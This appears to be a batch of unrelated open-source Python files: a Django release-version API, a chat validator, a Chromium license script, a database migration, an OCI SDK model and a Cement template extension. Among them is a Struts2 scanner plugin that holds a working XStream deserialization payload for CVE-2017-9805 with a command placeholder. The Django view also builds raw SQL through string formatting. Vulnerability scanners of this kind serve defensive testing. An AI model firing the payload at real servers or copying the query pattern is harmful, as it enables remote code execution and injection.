serializer_class = serializers.ReleaseVersionsCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
self.perform_create(serializer)
return JsonResponseV1(message="创建成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsUpdate(UpdateAPIView):
"""更新版本号,该类只更新单条记录"""
permission_classes = (permissions.CanUpdateVersionsPermission,)
def put(self, request, *args, **kwargs):
serializer = serializers.ReleaseVersionsSerializer(
instance=models.ReleaseVersions.objects.get(pk=kwargs['key']), # 返回单条记录
data=request.data
)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="更新成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsDelete(DestroyAPIView):
"""删除版本"""
permission_classes = (permissions.CanDeleteVersionsPermission,)
queryset = models.ReleaseVersions.objects.all()
lookup_field = 'id' # 默认为主键,可不写
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return JsonResponseV1(message="删除成功")
class ReleaseVersionsView(APIView):
"""获取指定版本内工单在所有环境的进度"""
def get(self, request, *args, **kwargs):
# 获取版本对应的主键
version = kwargs.get('version')
version_id = models.ReleaseVersions.objects.get(version=version).pk
# 获取环境,行转为动态列
obj = models.DbEnvironment.objects.values('id', 'name')
row2columns = ''
for row in obj:
row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']},"
# 获取任务下所有工单分别在各个环境中的状态,此处的环境为动态环境
# id没有实际意义
query = f"select " + row2columns + \
f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \
f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant"
rawquery = models.DbOrders.objects.raw(query)
# 获取环境列名
dynamic_columns = list(rawquery.columns)[:-4]
data = []
for row in rawquery:
columns = {
'id': row.id,
'escape_title': row.escape_title,
'order_id': row.order_id,
'applicant': row.applicant,
}
for col in dynamic_columns:
columns[col] = getattr(row, col)
data.append(columns)
render_columns = [
{'key': 'escape_title', 'ellipsis': True, 'value': '标题'},
{'key': 'applicant', 'value': '申请人'},
]
render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns])
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': data}
return JsonResponseV1(data=data)
|
dino/validation/events/message/limit_msg_length.py | thenetcircle/dino | 150 | 8490 | <reponame>thenetcircle/dino
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import traceback
from yapsy.IPlugin import IPlugin
from activitystreams.models.activity import Activity
from dino import utils
from dino.config import ErrorCodes
from dino.config import ConfigKeys
from dino.environ import GNEnvironment
logger = logging.getLogger(__name__)
__author__ = '<NAME> <<EMAIL>>'
class OnMessageCheckContentLength(IPlugin):
def __init__(self):
super(OnMessageCheckContentLength, self).__init__()
self.env = None
self.enabled = False
self.max_length = 1000
def setup(self, env: GNEnvironment):
self.env = env
validation_config = self.env.config.get(ConfigKeys.VALIDATION)
if 'on_message' not in validation_config or 'limit_msg_length' not in validation_config.get('on_message'):
logger.info('no config enabled for plugin not_full, ignoring plugin')
return
on_create_config = validation_config.get('on_message').get('limit_msg_length')
self.enabled = True
self.max_length = on_create_config.get(ConfigKeys.MAX_MSG_LENGTH, 1000)
def _process(self, data: dict, activity: Activity):
message = activity.object.content
if message is None or len(message.strip()) == 0:
return True, None, None
if not utils.is_base64(message):
return False, ErrorCodes.NOT_BASE64, \
'invalid message content, not base64 encoded'
message = utils.b64d(message)
if len(message) > self.max_length:
return False, ErrorCodes.MSG_TOO_LONG, \
'message content needs to be shorter than %s characters' % self.max_length
return True, None, None
def __call__(self, *args, **kwargs) -> (bool, str):
if not self.enabled:
return
data, activity = args[0], args[1]
try:
return self._process(data, activity)
except Exception as e:
logger.error('could not execute plugin not_full: %s' % str(e))
logger.exception(traceback.format_exc())
return False, ErrorCodes.VALIDATION_ERROR, 'could not execute validation plugin not_full'
|
testing/scripts/checklicenses.py | zealoussnow/chromium | 14,668 | 8497 | <reponame>zealoussnow/chromium
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import sys
import common
def main_run(args):
with common.temporary_file() as tempfile_path:
rc = common.run_command([
os.path.join(common.SRC_DIR, 'tools', 'checklicenses',
'checklicenses.py'),
'--json', tempfile_path
])
with open(tempfile_path) as f:
checklicenses_results = json.load(f)
result_set = set()
for result in checklicenses_results:
result_set.add((result['filename'], result['license']))
json.dump({
'valid': True,
'failures': ['%s: %s' % (r[0], r[1]) for r in result_set],
}, args.output)
return rc
def main_compile_targets(args):
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
|
python/app/plugins/http/Struts2/S2_052.py | taomujian/linbing | 351 | 8513 | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') |
stores/apps/inventory/migrations/0001_initial.py | diassor/CollectorCity-Market-Place | 135 | 8560 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ProductType'
db.create_table('inventory_producttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('inventory', ['ProductType'])
# Adding model 'Product'
db.create_table('inventory_product', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('shop', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shops.Shop'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
('description', self.gf('django.db.models.fields.TextField')()),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'])),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'])),
('date_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('weight', self.gf('django.db.models.fields.DecimalField')(default='0', max_digits=11, decimal_places=2)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['inventory.ProductType'], null=True, blank=True)),
))
db.send_create_signal('inventory', ['Product'])
# Adding model 'Coin'
db.create_table('inventory_coin', (
('producttype_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['inventory.ProductType'], unique=True, primary_key=True)),
('category', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketCategory'], null=True, blank=True)),
('subcategory', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['market.MarketSubCategory'], null=True, blank=True)),
('country_code', self.gf('django.db.models.fields.CharField')(default='us', max_length=2)),
('pcgs_number', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('description', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('year_issued', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('actual_year', self.gf('django.db.models.fields.CharField')(default='', max_length=24, blank='')),
('denomination', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('major_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('die_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('prefix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('suffix', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('sort_order', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('heading', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('holder_variety_2', self.gf('django.db.models.fields.CharField')(default='', max_length=60, blank='')),
('additional_data', self.gf('django.db.models.fields.TextField')(default='', blank='')),
('last_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('inventory', ['Coin'])
def backwards(self, orm):
# Deleting model 'ProductType'
db.delete_table('inventory_producttype')
# Deleting model 'Product'
db.delete_table('inventory_product')
# Deleting model 'Coin'
db.delete_table('inventory_coin')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('<PASSWORD>', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'inventory.coin': {
'Meta': {'object_name': 'Coin', '_ormbases': ['inventory.ProductType']},
'actual_year': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"}),
'additional_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']", 'null': 'True', 'blank': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'default': "'us'", 'max_length': '2'}),
'denomination': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': "''"}),
'die_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'heading': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'holder_variety_2': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'major_variety': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'pcgs_number': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'prefix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'producttype_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['inventory.ProductType']", 'unique': 'True', 'primary_key': 'True'}),
'sort_order': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']", 'null': 'True', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '60', 'blank': "''"}),
'year_issued': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '24', 'blank': "''"})
},
'inventory.product': {
'Meta': {'object_name': 'Product'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketCategory']"}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shops.Shop']"}),
'subcategory': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketSubCategory']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['inventory.ProductType']", 'null': 'True', 'blank': 'True'}),
'weight': ('django.db.models.fields.DecimalField', [], {'default': "'0'", 'max_digits': '11', 'decimal_places': '2'})
},
'inventory.producttype': {
'Meta': {'object_name': 'ProductType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketsubcategory': {
'Meta': {'unique_together': "(('parent', 'slug'),)", 'object_name': 'MarketSubCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'subcategories'", 'null': 'True', 'to': "orm['market.MarketCategory']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '60', 'db_index': 'True'})
},
'shops.shop': {
'Meta': {'object_name': 'Shop'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bids': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'39.29038,-76.61219'", 'max_length': '255'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['inventory']
|
src/oci/management_agent/models/management_agent_aggregation_dimensions.py | CentroidChef/oci-python-sdk | 249 | 8563 | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ManagementAgentAggregationDimensions(object):
"""
The Aggregation of Management Agent Dimensions
"""
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "ACTIVE"
AVAILABILITY_STATUS_ACTIVE = "ACTIVE"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "SILENT"
AVAILABILITY_STATUS_SILENT = "SILENT"
#: A constant which can be used with the availability_status property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "NOT_AVAILABLE"
AVAILABILITY_STATUS_NOT_AVAILABLE = "NOT_AVAILABLE"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "LINUX"
PLATFORM_TYPE_LINUX = "LINUX"
#: A constant which can be used with the platform_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "WINDOWS"
PLATFORM_TYPE_WINDOWS = "WINDOWS"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "AGENT"
INSTALL_TYPE_AGENT = "AGENT"
#: A constant which can be used with the install_type property of a ManagementAgentAggregationDimensions.
#: This constant has a value of "GATEWAY"
INSTALL_TYPE_GATEWAY = "GATEWAY"
def __init__(self, **kwargs):
"""
Initializes a new ManagementAgentAggregationDimensions object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param availability_status:
The value to assign to the availability_status property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type availability_status: str
:param platform_type:
The value to assign to the platform_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type platform_type: str
:param version:
The value to assign to the version property of this ManagementAgentAggregationDimensions.
:type version: str
:param has_plugins:
The value to assign to the has_plugins property of this ManagementAgentAggregationDimensions.
:type has_plugins: bool
:param install_type:
The value to assign to the install_type property of this ManagementAgentAggregationDimensions.
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type install_type: str
"""
self.swagger_types = {
'availability_status': 'str',
'platform_type': 'str',
'version': 'str',
'has_plugins': 'bool',
'install_type': 'str'
}
self.attribute_map = {
'availability_status': 'availabilityStatus',
'platform_type': 'platformType',
'version': 'version',
'has_plugins': 'hasPlugins',
'install_type': 'installType'
}
self._availability_status = None
self._platform_type = None
self._version = None
self._has_plugins = None
self._install_type = None
@property
def availability_status(self):
"""
Gets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
Allowed values for this property are: "ACTIVE", "SILENT", "NOT_AVAILABLE", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The availability_status of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._availability_status
@availability_status.setter
def availability_status(self, availability_status):
"""
Sets the availability_status of this ManagementAgentAggregationDimensions.
The availability status of managementAgent
:param availability_status: The availability_status of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["ACTIVE", "SILENT", "NOT_AVAILABLE"]
if not value_allowed_none_or_none_sentinel(availability_status, allowed_values):
availability_status = 'UNKNOWN_ENUM_VALUE'
self._availability_status = availability_status
@property
def platform_type(self):
"""
Gets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
Allowed values for this property are: "LINUX", "WINDOWS", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The platform_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._platform_type
@platform_type.setter
def platform_type(self, platform_type):
"""
Sets the platform_type of this ManagementAgentAggregationDimensions.
Platform Type
:param platform_type: The platform_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["LINUX", "WINDOWS"]
if not value_allowed_none_or_none_sentinel(platform_type, allowed_values):
platform_type = 'UNKNOWN_ENUM_VALUE'
self._platform_type = platform_type
@property
def version(self):
"""
Gets the version of this ManagementAgentAggregationDimensions.
Agent image version
:return: The version of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""
Sets the version of this ManagementAgentAggregationDimensions.
Agent image version
:param version: The version of this ManagementAgentAggregationDimensions.
:type: str
"""
self._version = version
@property
def has_plugins(self):
"""
Gets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:return: The has_plugins of this ManagementAgentAggregationDimensions.
:rtype: bool
"""
return self._has_plugins
@has_plugins.setter
def has_plugins(self, has_plugins):
"""
Sets the has_plugins of this ManagementAgentAggregationDimensions.
Whether or not a managementAgent has at least one plugin
:param has_plugins: The has_plugins of this ManagementAgentAggregationDimensions.
:type: bool
"""
self._has_plugins = has_plugins
@property
def install_type(self):
"""
Gets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
Allowed values for this property are: "AGENT", "GATEWAY", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The install_type of this ManagementAgentAggregationDimensions.
:rtype: str
"""
return self._install_type
@install_type.setter
def install_type(self, install_type):
"""
Sets the install_type of this ManagementAgentAggregationDimensions.
The install type, either AGENT or GATEWAY
:param install_type: The install_type of this ManagementAgentAggregationDimensions.
:type: str
"""
allowed_values = ["AGENT", "GATEWAY"]
if not value_allowed_none_or_none_sentinel(install_type, allowed_values):
install_type = 'UNKNOWN_ENUM_VALUE'
self._install_type = install_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
cement/ext/ext_generate.py | tomekr/cement | 826 | 8583 | """
Cement generate extension module.
"""
import re
import os
import inspect
import yaml
import shutil
from .. import Controller, minimal_logger, shell
from ..utils.version import VERSION, get_version
LOG = minimal_logger(__name__)
class GenerateTemplateAbstractBase(Controller):
class Meta:
pass
def _generate(self, source, dest):
msg = 'Generating %s %s in %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
data = {}
# builtin vars
maj_min = float('%s.%s' % (VERSION[0], VERSION[1]))
data['cement'] = {}
data['cement']['version'] = get_version()
data['cement']['major_version'] = VERSION[0]
data['cement']['minor_version'] = VERSION[1]
data['cement']['major_minor_version'] = maj_min
f = open(os.path.join(source, '.generate.yml'))
yaml_load = yaml.full_load if hasattr(yaml, 'full_load') else yaml.load
g_config = yaml_load(f)
f.close()
vars = g_config.get('variables', {})
exclude_list = g_config.get('exclude', [])
ignore_list = g_config.get('ignore', [])
# default ignore the .generate.yml config
g_config_yml = r'^(.*)[\/\\\\]%s[\/\\\\]\.generate\.yml$' % \
self._meta.label
ignore_list.append(g_config_yml)
var_defaults = {
'name': None,
'prompt': None,
'validate': None,
'case': None,
'default': None,
}
for defined_var in vars:
var = var_defaults.copy()
var.update(defined_var)
for key in ['name', 'prompt']:
assert var[key] is not None, \
"Required generate config key missing: %s" % key
val = None
if var['default'] is not None and self.app.pargs.defaults:
val = var['default']
elif var['default'] is not None:
default_text = ' [%s]' % var['default']
else:
default_text = '' # pragma: nocover
if val is None:
class MyPrompt(shell.Prompt):
class Meta:
text = "%s%s:" % (var['prompt'], default_text)
default = var.get('default', None)
p = MyPrompt()
val = p.prompt() # pragma: nocover
if var['case'] in ['lower', 'upper', 'title']:
val = getattr(val, var['case'])()
elif var['case'] is not None:
self.app.log.warning(
"Invalid configuration for variable " +
"'%s': " % var['name'] +
"case must be one of lower, upper, or title."
)
if var['validate'] is not None:
assert re.match(var['validate'], val), \
"Invalid Response (must match: '%s')" % var['validate']
data[var['name']] = val
try:
self.app.template.copy(source, dest, data,
force=self.app.pargs.force,
ignore=ignore_list,
exclude=exclude_list)
except AssertionError as e:
if re.match('(.*)already exists(.*)', e.args[0]):
raise AssertionError(e.args[0] + ' (try: --force)')
else:
raise # pragma: nocover
def _clone(self, source, dest):
msg = 'Cloning %s %s template to %s' % (
self.app._meta.label, self._meta.label, dest
)
self.app.log.info(msg)
if os.path.exists(dest) and self.app.pargs.force is True:
shutil.rmtree(dest)
elif os.path.exists(dest):
msg = "Destination path already exists: %s (try: --force)" % dest
raise AssertionError(msg)
shutil.copytree(source, dest)
def _default(self):
source = self._meta.source_path
dest = self.app.pargs.dest
if self.app.pargs.clone is True:
self._clone(source, dest)
else:
self._generate(source, dest)
def setup_template_items(app):
template_dirs = []
template_items = []
# look in app template dirs
for path in app._meta.template_dirs:
subpath = os.path.join(path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# use app template module, find it's path on filesystem
if app._meta.template_module is not None:
mod_parts = app._meta.template_module.split('.')
mod = mod_parts.pop()
try:
mod = app.__import__(mod, from_module='.'.join(mod_parts))
mod_path = os.path.dirname(inspect.getfile(mod))
subpath = os.path.join(mod_path, 'generate')
if os.path.exists(subpath) and subpath not in template_dirs:
template_dirs.append(subpath)
# FIXME: not exactly sure how to test for this so not covering
except AttributeError: # pragma: nocover
msg = 'unable to load template module' + \
'%s from %s' % (mod, '.'.join(mod_parts)) # pragma: nocover
app.log.debug(msg) # pragma: nocover
for path in template_dirs:
for item in os.listdir(path):
if item not in template_items:
template_items.append(item)
class GenerateTemplate(GenerateTemplateAbstractBase):
class Meta:
label = item
stacked_on = 'generate'
stacked_type = 'nested'
help = 'generate %s from template' % item
arguments = [
# ------------------------------------------------------
(['dest'],
{'help': 'destination directory path'}),
# ------------------------------------------------------
(['-f', '--force'],
{'help': 'force operation if destination exists',
'dest': 'force',
'action': 'store_true'}),
# ------------------------------------------------------
(['-D', '--defaults'],
{'help': 'use all default variable values',
'dest': 'defaults',
'action': 'store_true'}),
# ------------------------------------------------------
(['--clone'],
{'help': 'clone this template to destination path',
'dest': 'clone',
'action': 'store_true'}),
]
source_path = os.path.join(path, item)
app.handler.register(GenerateTemplate)
class Generate(Controller):
class Meta:
label = 'generate'
stacked_on = 'base'
stacked_type = 'nested'
config_section = 'generate'
def _setup(self, app):
super(Generate, self)._setup(app)
def _default(self):
